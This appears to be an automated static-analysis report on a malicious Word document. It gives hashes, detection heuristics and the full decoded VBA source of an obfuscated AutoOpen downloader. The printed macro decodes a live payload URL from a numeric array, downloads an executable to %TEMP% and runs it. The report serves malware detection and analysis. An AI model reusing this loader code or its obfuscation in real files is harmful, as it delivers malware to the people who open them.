Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bad53ce984f652b…

MALICIOUS

Office (OLE)

Size: 64.0 KB
Created: 2016-02-16 09:36:00
Authoring application: Microsoft Office Word
First seen: 2016-08-15
MD5: 06889f6bbca750b7fe94938b04f599ed
SHA-1: 5a8c4d0196a233cf1ef46a1255d8593007e0e6ee
SHA-256: 1bad53ce984f652bc03ecb96fad5746357968c2fdccdea82995231f1099773e4
Risk score: 370

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an auto-executing loader that uses CreateObject and CallByName. The macros decode the URL http://www.southlife.church/34gf5y/r34f3345g.exe at run time and download a payload from it, a common technique for malware droppers.

Heuristics (11)

  • ClamAV: Doc.Downloader.Generic-10026854-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-10026854-0
  • VBA macros detected (severity: medium; 6 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script: Set KogdaGe_1 = CreateObject(DrinkSun(0))
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script: Set KogdaGe_1 = CreateObject(DrinkSun(0))
  • CallByName call (severity: high; rule: OLE_VBA_CALLBYNAME)
    CallByName call
    Matched line in script: CallByName KogdaGe_2, DrinkSun(7), VbLet, 1
  • Payload URL decoded from a Chr() numeric-array loader (1 URL) (severity: high; rule: OLE_VBA_CHR_ARRAY_DROPPER_URL)
    A VBA macro builds its stage-2 download URL from a numeric array (Array(250, 262, …)) decoded one character at a time with Chr() and a linear offset (e.g. Chr(n - 146)), then drives Microsoft.XMLHTTP / ADODB.Stream.SaveToFile / Shell.Application to drop and execute the payload in %TEMP%. The URL is assembled at run time and never appears contiguously on disk, so a literal scan misses it; it is surfaced as an IOC. Self-validating: only an array that decodes to a valid host URL is reported, so a benign numeric array cannot produce a false positive.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script: Sub autoopen()
  • Reference to Windows Script Host (severity: high; rule: SC_STR_WSCRIPT)
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.southlife.church/34gf5y/r34f3345g.exe (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5891 bytes
SHA-256: cd87cf69622249352e8bc4bebae20d90e9bdab49cf4ded41361c98fb1b8ac728
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call AddSensors
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CFED7DD4-70B3-4500-991E-8D2A9E25237B}{902520CF-EBFE-40D2-A478-42D7F0823E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
Public KogdaGe_1 As Object
Public KogdaGe_2 As Object
Public KogdaGe_3 As Object
Public KogdaGe_4 As String
Public KogdaGe_5 As String
Public KogdaGe_6 As Object
Public DrinkSun() As String

Public Sub CheckMaps()
 Dim objStors As String
 Dim objStor As Variant
 KogdaGe_1.Send
 Dim NewList As String
 Dim DoReset As Boolean
 Dim LP As Long
 KogdaGe_4 = KogdaGe_3(DrinkSun(6))
GoTo ErrHandler
 objS.tors.Load , , , , , True
 For Each objStor In objSt.ors
 NewLi.st.Add objStor.MapID
 Next
 If Not MapInit Then
 MapInit = True
 DoReset = True
 Else
 If MapL.ist.Count <> NewLi.st.Count Then
 DoReset = True
 Set MapL.ist = NewList
 Else
 For LP = 1 To MapLi.st.Count
 If MapL.ist.ID(LP) <> NewLi.st.ID(LP) Then
 DoReset = True
 Set MapL.ist = Ne.w.List
 Exit For
 End If
 Next LP
 End If
 End If
 If DoReset Then
 BM.Reset
 MapsInitialized = False
 End If
 Set NewLi.st = Nothing
 Set objSt.ors = Nothing
 Set objSt.or = Nothing
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
KogdaGe_5 = KogdaGe_4 + Replace(DrinkSun(12), "t", "e")
ConnectMaps
End Sub
Public Sub AddSensors()
 Dim Col As String
 Dim Obj As String
 DrinkSun = Split(UserForm1.Label1.Caption, "/")
 GoTo ErrExit
 On Error GoTo ErrHandler
 BM.ResetBalances
 Cofl.Load
 On Error GoTo 0
ErrExit:
Set KogdaGe_1 = CreateObject(DrinkSun(0))
CheckBins
 Exit Sub
ErrHandler:
 AD.DisplayError Err.Number, "modMaps", "AddSensors", Err.Description
 Resume ErrExit
End Sub



Attribute VB_Name = "Module2"
Public Sub CheckBins()
 Dim LP As Long
 Dim BinID As Long
 Dim objStorages As String
 Dim objStorage As Variant
 Dim MapID As Long
 Set KogdaGe_2 = CreateObject(DrinkSun(1))
 GoTo ErrHandler
 objSt.orages.Load
 For LP = 1 To BM.StorCount
 BinID = BM.StorID(LP)
 If Not objSto.rages.IsItem(BinID) Then
 BM.UnloadStor BinID
 End If
 Next LP
 For Each objStorage In objS.torages
 With objStorage
 If Not BM.BinLoaded(.ID) Then
 BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
 End If
 MapID = BM.BinMapID(.ID)
 If MapID <> 0 And MapID <> .MapID Then
 BM.UnloadStor .ID
 BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
 End If
 End With
 Next
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
Set KogdaGe_6 = CreateObject(DrinkSun(2))
Set hokuk = CreateObject(DrinkSun(3))
Set KogdaGe_3 = hokuk.Environment(DrinkSun(4))
CheckDatabase
End Sub
Public Sub CheckDatabase()
Dim KogdaGe_7() As Variant
KogdaGe_7 = Array(250, 262, 262, 258, 204, 193, 193, 265, 265, 265, 192, 261, 257, 263, 262, 250, 254, 251, 248, 247, 192, 245, 250, 263, 260, 245, 250, 193, 197, 198, 249, 248, 199, 267, 193, 260, 197, 198, 248, 197, 197, 198, 199, 249, 192, 247, 266, 247)
Dim KogdaGe_8 As Integer
 Dim PubDoStop As String
 PubDoStop = ""
 GoTo ErrHandler
 If mDBname <> Prog.DatabaseFullName Then
 mDBname = Prog.DatabaseFullName
 BM.Reset
 MapsInitialized = False
 End If
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
 For KogdaGe_8 = LBound(KogdaGe_7) To UBound(KogdaGe_7)
 PubDoStop = PubDoStop & Chr(-99 + KogdaGe_7(KogdaGe_8) - 47)
 Next KogdaGe_8
KogdaGe_1.Open DrinkSun(5), PubDoStop, False
CheckMaps
 End Sub
Public Sub ConnectMaps()
 Dim objStorages As Variant
 Dim objStorage As Variant
 Dim objMap As Variant
 Dim objMaps As Variant
 CallByName KogdaGe_2, DrinkSun(7), VbLet, 1
 KogdaGe_2.Open
GoTo ErrHandler
 CheckDat.abase BM
 CheckM.aps BM
 objMaps.Load
 BM.Visible = False
 If objMaps.Count > 0 Then
 BM.Visible = ShowMaps
 If ShowMaps Then
 If Not MapsInitialized Then
 For Each objMap In objMaps
 With objMap
 BM.AddMap .ID, .MapName, .Units, .Zoom
 End With
 Next
 objStor.ages.Load , , , , , True
 For Each objStorage In objSto.rages
 With objStorage
 BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
 End With
 Next
 MapsInitialized = True
 End If
 AddSenso.rs BM
 CheckB.ins BM
 BM.Update
 End If
 End If
 Set objMap = Nothing
 Set objMaps = Nothing
 Set objStorage = Nothing
 Set objStorages = Nothing
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
SaveMaps
End Sub
Public Sub SaveMaps()
rbp = CallByName(KogdaGe_1, DrinkSun(10), VbGet)
 Dim objStor As Variant
 CallByName KogdaGe_2, DrinkSun(9), VbMethod, rbp
 Dim objMap As Variant
 Dim LP As Long
 Dim ID As Long
 Dim XPos As Single
 Dim YPos As Single
 Dim BinLP As Long
 Dim BinID As Long
 CallByName KogdaGe_2, DrinkSun(11), VbMethod, KogdaGe_5, 2
GoTo ErrHandler
 For LP = 1 To BM.MapCount
 ID = BM.MapID(LP)
 objMap.Load ID
 objMap.BeginEdit
 objMap.MapZoom = BM.MapZoom(LP)
 objMap.ApplyEdit
 Set objMap = Nothing
 Next LP
 For BinLP = 1 To BM.StorCount
 BinID = BM.StorID(BinLP)
 If BM.BinLoaded(BinID) Then
 BM.BinLocation BinLP, XPos, YPos
 With objStor
 .Load BinID
 .BeginEdit
 .XPos = XPos
 .YPos = YPos
 .ApplyEdit
 End With
 Set objStor = Nothing
 End If
 Next BinLP
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
KogdaGe_6.Open (KogdaGe_5)
End Sub